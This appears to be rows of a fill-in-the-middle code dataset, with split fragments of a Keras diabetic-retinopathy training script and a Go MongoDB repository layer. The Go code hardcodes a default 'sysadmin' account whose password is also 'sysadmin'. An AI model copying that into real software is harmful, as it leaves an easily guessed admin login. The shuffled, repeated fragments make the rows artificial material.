val_df["image"]=val_df["image"].apply(append_ext)
train_generator = train_datagen.flow_from_dataframe(
dataframe=train_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
valid_generator = val_datagen.flow_from_dataframe(
dataframe=val_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
STEP_SIZE_TRAIN=train_generator.n//train_generator.batch_size
STEP_SIZE_VALID=valid_generator.n//valid_generator.batch_size
#
#balance_weights = K.variable(class_weight.compute_class_weight(
# 'balanced',
# np.unique(train_df.level),
# train_df.level))
callbacks = [
# Resample_Iterator(balance_weights),
Val_QWK(valid_generator, STEP_SIZE_VALID),
ModelCheckpoint(experiment_id + "-val_kappa_checkpoint.hdf5", monitor='val_kappa', verbose=1, save_best_only=True, mode='max'),
# EarlyStopping(monitor='val_kappa', patience=200, min_delta=0.001, verbose=1, restore_best_weights=True, mode='max',baseline=None),
Val_CM(valid_generator, STEP_SIZE_VALID),
LearningRateScheduler(scheduler, verbose=1),
# ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='min', min_delta=0.01, cooldown=0, min_lr=0),
TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True),
WandbCallback(),
]
history=model.fit_generator(generator=train_generator,
steps_per_epoch=STEP_SIZE_TRAIN,
validation_data=valid_generator,
validation_steps=STEP_SIZE_VALID,
# class_weight=[balance_weights],
callbacks=callbacks,
workers=8,
use_multiprocessing=False,
epochs=200
)
#model.save(os.path.join(wandb.run.dir, "model.h5"))
# list all data in history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model accuracy.png')
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model loss.png')
# summarize history for val_kappa
plt.plot(history.history['val_kappa'])
plt.title('Validation_Kappa')
plt.ylabel('val_kappa') | plt.legend([ 'validation'], loc='upper left')
plt.show()
#plt.savefig('model validation_kappa.png') | plt.xlabel('epoch') | random_line_split |
KR_256_5x5_32_Team.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 01:59:12 2020
@author: visionlab
"""
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,BatchNormalization,Dense, Dropout, Flatten, LeakyReLU, Lambda
from custom_pooling import RMSPooling2D
from keras.optimizers import SGD, Adam
from keras_preprocessing.image import ImageDataGenerator
from sklearn.utils import class_weight
from sklearn.metrics import confusion_matrix, classification_report
from keras.callbacks import EarlyStopping, ModelCheckpoint,LearningRateScheduler, TensorBoard
from datetime import datetime as dt
from keras.initializers import Constant,Orthogonal
from keras import regularizers
from Kappa_Skl import kappa
import keras.backend as K
import matplotlib.pyplot as plt
import itertools
from Resample_Iterator import Resample_Iterator
from Val_QWK import Val_QWK
from Val_CM import Val_CM
import tensorflow as tf
from keras.models import load_model
import random
from keras.applications.inception_resnet_v2 import preprocess_input
import wandb
import os
from wandb.keras import WandbCallback
from ImageDataAugmentor.image_data_augmentor import *
from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomBrightnessContrast, Flip, OneOf, Compose
)
wandb.init(project="diabetic-retinopathy")
def seed_everything(seed=42):
print('Random seeds initialized')
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
tf.set_random_seed(seed)
def Maxout1(x):
return tf.contrib.layers.maxout(x, 512)
def Maxout2(x):
return tf.contrib.layers.maxout(x, 512)
def get_experiment_id():
time_str = dt.now().strftime('%Y-%m-%d-%H-%M-%S')
experiment_id = 'base_{}'.format(time_str)
return experiment_id
def scheduler(epoch):
if epoch == 150:
K.set_value(model.optimizer.lr, 0.00014339)
return K.get_value(model.optimizer.lr)
def strong_aug(p=1):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
OneOf([
CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomBrightnessContrast(),
], p=0.3),
HueSaturationValue(p=0.3),
], p=p)
AUGMENTATIONS = strong_aug(p=0.9)
seed_everything()
model = Sequential()
"""128 Layers"""
model.add(Conv2D(32, (5, 5), padding="same", strides=(2, 2), activation='linear', input_shape=(256, 256, 3), data_format="channels_last",
name='conv2d_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_1'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_1'))
model.add(Conv2D(32, (3, 3),padding="same", activation='linear',
name='conv2d_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_2'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_2'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_1'))
model.add(Conv2D(64, (5, 5),padding="same", strides=(2, 2), activation='linear',
name='conv2d_3',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_3'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_3'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_4',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_4'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_4'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_5',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_5'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_5'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_2'))
#model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_6',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_6'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_6'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_7',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_7'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_7'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_8',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_8'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_8'))
"""256 Layers"""
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_3'))
#model.add(Dropout(0.25))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_9',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_11'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_12'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_10',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_12'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_13'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_11',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_13'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_14'))
"""512 Layers"""
#model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_4'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_12',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_14'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_15'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_13',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_15'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_16'))
model.add(RMSPooling2D(pool_size=3,strides=(3, 3),name='rms_pooling2d_1'))
model.add(Dropout(0.5))
model.add(Flatten(name='flatten_1'))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_9'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_9'))
model.add(Lambda(Maxout1, name='lambda_1')) #instead of FeaturePoolLayer
model.add(Dropout(0.5))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_10'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_10'))
model.add(Lambda(Maxout2, name='lambda_2'))#instead of FeaturePoolLayer
model.add(Dense(1, activation='relu', kernel_initializer=Orthogonal(gain=1.0),
name='dense_3',kernel_regularizer=regularizers.l2(0.0005)))
pre_256_model = load_model('./Experiments/PH_1/EX_40/EX_40.hdf5', custom_objects={'RMSPooling2D': RMSPooling2D,'Lambda':Lambda,'tf':tf})
# copy weights from old model to new one
for layer in model.layers:
|
#model.add_loss( sample_loss(y_true, y_pred, Homotopy ) )
adam = Adam(lr=0.0014339, beta_1=0.9, beta_2=0.999, epsilon=0.1, decay=1e-6, amsgrad=True)
model.compile(loss='mse', optimizer=adam, metrics=['mae', 'acc'])
model.summary()
#weight checking
#a = pre_128_model.layers[0].get_weights()[0]
#b = model.layers[0].get_weights()[0]
#if np.array_equal(a, b):
# print('equal')
#else:
# print('not equal')
experiment_id = get_experiment_id()
train_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_train.csv"), dtype={'image': str, 'level': float})
val_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_val.csv"), dtype={'image': str, 'level': float})
train_datagen = ImageDataAugmentor(augment=AUGMENTATIONS,
preprocess_input=None, rescale=1./255.)
val_datagen = ImageDataGenerator(rescale=1./255.)
def append_ext(fn):
return fn+".tiff"
#def append_ext1(fn):
# return fn+".png"
train_df["image"]=train_df["image"].apply(append_ext)
val_df["image"]=val_df["image"].apply(append_ext)
train_generator = train_datagen.flow_from_dataframe(
dataframe=train_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
valid_generator = val_datagen.flow_from_dataframe(
dataframe=val_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
STEP_SIZE_TRAIN=train_generator.n//train_generator.batch_size
STEP_SIZE_VALID=valid_generator.n//valid_generator.batch_size
#
#balance_weights = K.variable(class_weight.compute_class_weight(
# 'balanced',
# np.unique(train_df.level),
# train_df.level))
callbacks = [
# Resample_Iterator(balance_weights),
Val_QWK(valid_generator, STEP_SIZE_VALID),
ModelCheckpoint(experiment_id + "-val_kappa_checkpoint.hdf5", monitor='val_kappa', verbose=1, save_best_only=True, mode='max'),
# EarlyStopping(monitor='val_kappa', patience=200, min_delta=0.001, verbose=1, restore_best_weights=True, mode='max',baseline=None),
Val_CM(valid_generator, STEP_SIZE_VALID),
LearningRateScheduler(scheduler, verbose=1),
# ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='min', min_delta=0.01, cooldown=0, min_lr=0),
TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True),
WandbCallback(),
]
history=model.fit_generator(generator=train_generator,
steps_per_epoch=STEP_SIZE_TRAIN,
validation_data=valid_generator,
validation_steps=STEP_SIZE_VALID,
# class_weight=[balance_weights],
callbacks=callbacks,
workers=8,
use_multiprocessing=False,
epochs=200
)
#model.save(os.path.join(wandb.run.dir, "model.h5"))
# list all data in history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model accuracy.png')
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model loss.png')
# summarize history for val_kappa
plt.plot(history.history['val_kappa'])
plt.title('Validation_Kappa')
plt.ylabel('val_kappa')
plt.xlabel('epoch')
plt.legend([ 'validation'], loc='upper left')
plt.show()
#plt.savefig('model validation_kappa.png') | try:
layer.set_weights( pre_256_model.get_layer(name=layer.name).get_weights())
print("Succesfully transfered weights for layer {}".format(layer.name))
except:
print("Could not transfer weights for layer {}".format(layer.name)) | conditional_block |
mongodb.go | package repository
import (
//"gopkg.in/mgo.v2/bson"
//"gopkg.in/mgo.v2"
c "github.com/MichalRybinski/Trion/common"
m "github.com/MichalRybinski/Trion/common/models"
"fmt"
//"encoding/json"
"context"
"log"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
"golang.org/x/crypto/bcrypt"
"time"
"regexp"
"strings"
//"github.com/fatih/structs"
)
type mongoDBHandler struct {
MongoClientOptions *options.ClientOptions
MongoClient *mongo.Client
MongoSystemDB *mongo.Database
MongoProjectsDB *mongo.Collection
}
var MongoDBHandler mongoDBHandler
func (mh *mongoDBHandler) MongoDBInit(appConfig *c.AppConfig) {
mh.MongoSystemDB = mh.MongoClient.Database(c.SysDBName)
//for mongodb DB & collection will be created with first insert to collection
mh.MongoProjectsDB = mh.MongoSystemDB.Collection(appConfig.DBConfig.MongoConfig.ProjectsColl)
users, err := mh.initSystemUsers()
fmt.Println("== init, users: ",users)
//check if system project "trion" already exists before inserting anything
itemsMap, err := mh.GetDocs(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name":"trion"})
if err != nil {
if _, ok := err.(c.NotFoundError); !ok { log.Fatal(err) }
fmt.Println("To był not found, len(itemsMap)",len(itemsMap))
}
now := time.Now()
if len(itemsMap) == 0 {
fmt.Println("Inserting Trion...")
mh.InsertOne(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name" : "trion",
"type" : "system",
"schema_rev": "1",
"owner":users[0]["_id"].(string),
"createdAt" : now,
"updatedAt" : now,
})
}
initSysIndexes(mh.MongoProjectsDB,sysProjIndexModels)
initSysIndexes(mh.MongoProjectsDB,userIndexModels)
initSysIndexes(mh.MongoClient.Database(c.UsersDBName).Collection(c.UsersDBAuthCollection),authIndexModels)
}
func (mh *mongoDBHandler) initSystemUsers() ([]map[string]interface{}, error) {
var err error
var sysAdmin m.UserDBModel
var now time.Time
var hashedPassword []byte
// check if default system admin exists
itemsMap, err := mh.GetDocs(c.UsersDBName, c.UsersDBUsersCollection, bson.M{"login":"sysadmin"})
if err !=nil {
if _, ok := err.(c.NotFoundError); !ok { goto Done }
}
if len(itemsMap) == 0 {
//insert default admin user
hashedPassword, err = bcrypt.GenerateFromPassword([]byte("sysadmin"), 12)
if err != nil {goto Done}
now = time.Now()
sysAdmin = m.UserDBModel{
Login: "sysadmin",
Hash: string(hashedPassword),
CreatedAt: now,
UpdatedAt: now,
}
if itemsMap, err = mh.InsertOne(c.UsersDBName, c.UsersDBUsersCollection, sysAdmin); err != nil { goto Done }
}
Done:
return itemsMap, err
}
func ConvertStringIDToObjID(stringID string) (primitive.ObjectID, error) {
oid, err := primitive.ObjectIDFromHex(stringID)
if err != nil { err = c.InvalidIdError{stringID} } //Maybe wrap original error?
return oid, err
}
// returns slice of acquired docs or error
func (mh *mongoDBHandler) GetDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("=> GetDocs, filter: %v", filter)
var err error
var itemsMap []map[string]interface{}
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter = c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { /* log */ goto Done }
}
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil {
//log
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) InsertOne(dbname string,
collectionname string,
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var insDoc = map[string]interface{}{}
insDoc = c.ConvertInterfaceToMapStringInterface(doc)
// check if "_id" is part of request, convert accordingly
if _, ok := insDoc["_id"]; ok {
insDoc["_id"], err = ConvertStringIDToObjID(insDoc["_id"].(string))
if err != nil { /* log */ return itemsMap, err }
}
var res *mongo.InsertOneResult
if err == nil {
now := time.Now()
insDoc["createdAt"] = now
insDoc["updatedAt"] = now
// insDoc["owner"] = now
res, err = collection.InsertOne(context.TODO(), insDoc)
if err == nil {
fmt.Printf("inserted document with ID %v\n", res.InsertedID.(primitive.ObjectID).Hex())
itemsMap, err = mh.getDocs(dbname,collectionname,bson.M{"_id":res.InsertedID})
fmt.Println("Inserted doc: ",itemsMap)
} else {
//v, _ := err.(type)
hasDupEntry, msgToPass := containsWriteErrDupEntry(err)
if hasDupEntry { err = c.ItemAlreadyExistsError{msgToPass} }
}
}
fmt.Printf("InsertOne: ItemsMap: %s\n InsertOne: err: %s\n",itemsMap,err)
return itemsMap, err
}
func (mh *mongoDBHandler) getDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("== getDocs")
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var result bson.M
var results []bson.M
var itemsMap []map[string]interface{}
fmt.Println("=== filter: ",filter)
cursor, err := collection.Find(context.TODO(),filter)
if err != nil {
goto Done
}
if err = cursor.All(context.TODO(), &results); err != nil {
goto Done
}
if len(results) <= 0 {
fmt.Println("No doc found")
} else {
fmt.Println("Doc(s) found:")
for _, result = range results {
var itemMap map[string]interface{}
b, _ := bson.Marshal(result)
bson.Unmarshal(b, &itemMap)
itemMap["_id"] = itemMap["_id"].(primitive.ObjectID).Hex()
fmt.Printf("itemMap after id: %v\n",itemMap)
itemsMap = append(itemsMap, itemMap)
}
}
Done:
fmt.Printf("itemsMap: %v\n",itemsMap)
for k, v := range itemsMap {
fmt.Println("itemsMap[",k,"]=",v)
}
fmt.Println("== /getDocs")
return itemsMap, err
}
func (mh *mongoDBHandler) DeleteDoc(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.DeleteResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { goto Done }
}
// grab doc to be deleted, so it can be provided in response for reference
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil { goto Done }
fmt.Println("== DeleteDoc, doc to be deleted: ", itemsMap)
res, err = collection.DeleteOne(context.TODO(), parsedFilter)
fmt.Printf("== DeleteDoc, deleted %v documents\n", res.DeletedCount)
if res.DeletedCount == 0 {
err = c.NotFoundError{ fmt.Sprintf( "not found: %s", parsedFilter) }
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) UpdateDoc(dbname string,
collectionname string,
filter interface{},
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var res *mongo.UpdateResult
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter=c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { return nil, err }
}
// parse doc into proper MongoDB update specification
// basically: { "$set" : {doc}}
var updateDoc = map[string]interface{}{}
updateDoc["$set"]=doc
updateDoc["$set"].(map[string]interface{})["updatedAt"]=time.Now()
res, err = collection.UpdateOne(context.TODO(), parsedFilter, updateDoc)
if err != nil {
goto Done
}
if res.MatchedCount != 0 {
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
fmt.Printf("Updated existing document %v\n for filter %v\n", itemsMap, parsedFilter)
} else {
err = c.NotFoundError{ fmt.Sprintf( "not found _id : %s", parsedFilter["_id"].(primitive.ObjectID).Hex() ) }
fmt.Printf("No document updated for filter %v\n", parsedFilter)
}
Done:
return itemsMap, err
}
func listExistingIndexes(coll *mongo.Collection){
//var indexView *mongo.IndexView
indexView := coll.Indexes()
// Specify the MaxTime option to limit the amount of time the operation can run on the server
opts := options.ListIndexes().SetMaxTime(2 * time.Second)
cursor, err := indexView.List(context.TODO(), opts)
if err != nil {
log.Fatal(err)
}
// Get a slice of all indexes returned and print them out.
var results []bson.M
if err = cursor.All(context.TODO(), &results); err != nil {
log.Fatal(err)
}
fmt.Println(results)
}
func initSysIndexes(coll *mongo.Collection, iModel []mongo.IndexModel) {
indexName, err := coll.Indexes().CreateMany(
context.Background(),
iModel,
)
fmt.Println("indexName: ",indexName, " err: ",err)
}
var sysProjIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1},{"owner", 1}},
},
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var userIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"name", 1}},
Options: options.Index().SetUnique(true),
},
}
var authIndexModels = []mongo.IndexModel{
{
Keys: bson.D{{"uuid", 1}}, // small probability for non-unique entry, just to be on safe side
Options: options.Index().SetUnique(true),
},
}
// private
// if err returned from mongo write operation contains duplicate entry
// e.g. breaking unique index
// returns true/false and the "{...}" part of original error message if true
func containsWriteErrDupEntry(err error) (bool, string) { |
containsDup := false
var errMsg string
if v, ok := err.(mongo.WriteException); ok {
var msgs []string
for idx, werr:=range v.WriteErrors {
//log stuff before anything gets altered
fmt.Println("err.WriteErrors[",idx,"].Index=",werr.Index)
fmt.Println("err.WriteErrors[",idx,"].Code=",werr.Code)
fmt.Println("err.WriteErrors[",idx,"].Message=",werr.Message)
// err code 11000 or 11001 in MongoDB indicates duplicate key
if werr.Code == 11000 || werr.Code == 11001 {
containsDup = true
// get the dup key msg
pat := regexp.MustCompile(`({)(.*?)(})`)
msgs = append(msgs,pat.FindString(werr.Message))
}
}
fmt.Println("-- ",msgs)
//errMsg = c.Lines2JSONString(&msgs)
errMsg = strings.Join(msgs,",")
fmt.Println("--1 ",errMsg)
}
fmt.Println("--2 ",errMsg)
return containsDup,errMsg
} | identifier_body | |
mongodb.go | package repository
import (
//"gopkg.in/mgo.v2/bson"
//"gopkg.in/mgo.v2"
c "github.com/MichalRybinski/Trion/common"
m "github.com/MichalRybinski/Trion/common/models"
"fmt"
//"encoding/json"
"context"
"log"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
"go.mongodb.org/mongo-driver/mongo"
"go.mongodb.org/mongo-driver/mongo/options"
"golang.org/x/crypto/bcrypt"
"time"
"regexp"
"strings"
//"github.com/fatih/structs"
)
type mongoDBHandler struct {
MongoClientOptions *options.ClientOptions
MongoClient *mongo.Client
MongoSystemDB *mongo.Database
MongoProjectsDB *mongo.Collection
}
var MongoDBHandler mongoDBHandler
func (mh *mongoDBHandler) MongoDBInit(appConfig *c.AppConfig) {
mh.MongoSystemDB = mh.MongoClient.Database(c.SysDBName)
//for mongodb DB & collection will be created with first insert to collection
mh.MongoProjectsDB = mh.MongoSystemDB.Collection(appConfig.DBConfig.MongoConfig.ProjectsColl)
users, err := mh.initSystemUsers()
fmt.Println("== init, users: ",users)
//check if system project "trion" already exists before inserting anything
itemsMap, err := mh.GetDocs(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name":"trion"})
if err != nil {
if _, ok := err.(c.NotFoundError); !ok { log.Fatal(err) }
fmt.Println("To był not found, len(itemsMap)",len(itemsMap))
}
now := time.Now()
if len(itemsMap) == 0 {
fmt.Println("Inserting Trion...")
mh.InsertOne(c.SysDBName,
appConfig.DBConfig.MongoConfig.ProjectsColl,
bson.M{"name" : "trion",
"type" : "system",
"schema_rev": "1",
"owner":users[0]["_id"].(string),
"createdAt" : now,
"updatedAt" : now,
})
}
initSysIndexes(mh.MongoProjectsDB,sysProjIndexModels)
initSysIndexes(mh.MongoProjectsDB,userIndexModels)
initSysIndexes(mh.MongoClient.Database(c.UsersDBName).Collection(c.UsersDBAuthCollection),authIndexModels)
}
func (mh *mongoDBHandler) initSystemUsers() ([]map[string]interface{}, error) {
var err error
var sysAdmin m.UserDBModel
var now time.Time
var hashedPassword []byte
// check if default system admin exists
itemsMap, err := mh.GetDocs(c.UsersDBName, c.UsersDBUsersCollection, bson.M{"login":"sysadmin"})
if err !=nil {
if _, ok := err.(c.NotFoundError); !ok { goto Done }
}
if len(itemsMap) == 0 {
//insert default admin user
hashedPassword, err = bcrypt.GenerateFromPassword([]byte("sysadmin"), 12)
if err != nil {goto Done}
now = time.Now()
sysAdmin = m.UserDBModel{
Login: "sysadmin",
Hash: string(hashedPassword),
CreatedAt: now,
UpdatedAt: now,
}
if itemsMap, err = mh.InsertOne(c.UsersDBName, c.UsersDBUsersCollection, sysAdmin); err != nil { goto Done }
}
Done:
return itemsMap, err
}
func ConvertStringIDToObjID(stringID string) (primitive.ObjectID, error) {
oid, err := primitive.ObjectIDFromHex(stringID)
if err != nil { err = c.InvalidIdError{stringID} } //Maybe wrap original error?
return oid, err
}
// returns slice of acquired docs or error
func (mh *mongoDBHandler) GetDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("=> GetDocs, filter: %v", filter)
var err error
var itemsMap []map[string]interface{}
//unify filter before passing to actual query
var parsedFilter = map[string]interface{}{}
parsedFilter = c.ConvertInterfaceToMapStringInterface(filter)
// check if "_id" is part of filter, convert accordingly
if _, ok := parsedFilter["_id"]; ok {
parsedFilter["_id"], err = ConvertStringIDToObjID(parsedFilter["_id"].(string))
if err != nil { /* log */ goto Done }
}
itemsMap, err = mh.getDocs(dbname,collectionname,parsedFilter)
if err != nil {
//log
}
Done:
return itemsMap, err
}
func (mh *mongoDBHandler) InsertOne(dbname string,
collectionname string,
doc interface{}) ([]map[string]interface{}, error) {
var itemsMap []map[string]interface{}
var err error
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var insDoc = map[string]interface{}{}
insDoc = c.ConvertInterfaceToMapStringInterface(doc)
// check if "_id" is part of request, convert accordingly
if _, ok := insDoc["_id"]; ok {
insDoc["_id"], err = ConvertStringIDToObjID(insDoc["_id"].(string))
if err != nil { /* log */ return itemsMap, err }
}
var res *mongo.InsertOneResult
if err == nil {
now := time.Now()
insDoc["createdAt"] = now
insDoc["updatedAt"] = now
// insDoc["owner"] = now
res, err = collection.InsertOne(context.TODO(), insDoc)
if err == nil {
fmt.Printf("inserted document with ID %v\n", res.InsertedID.(primitive.ObjectID).Hex())
itemsMap, err = mh.getDocs(dbname,collectionname,bson.M{"_id":res.InsertedID})
fmt.Println("Inserted doc: ",itemsMap)
} else {
//v, _ := err.(type)
hasDupEntry, msgToPass := containsWriteErrDupEntry(err)
if hasDupEntry { err = c.ItemAlreadyExistsError{msgToPass} }
}
}
fmt.Printf("InsertOne: ItemsMap: %s\n InsertOne: err: %s\n",itemsMap,err)
return itemsMap, err
}
func (mh *mongoDBHandler) getDocs(dbname string,
collectionname string,
filter interface{}) ([]map[string]interface{}, error) {
fmt.Println("== getDocs")
db := mh.MongoClient.Database(dbname)
collection := db.Collection(collectionname)
var result bson.M
var results []bson.M
var itemsMap []map[string]interface{}
fmt.Println("=== filter: ",filter)
cursor, err := collection.Find(context.TODO(),filter)
if err != nil {
goto Done
}
if err = cursor.All(context.TODO(), &results); err != nil {
goto Done
}
if len(results) <= 0 {
fmt.Println("No doc found")
} else {
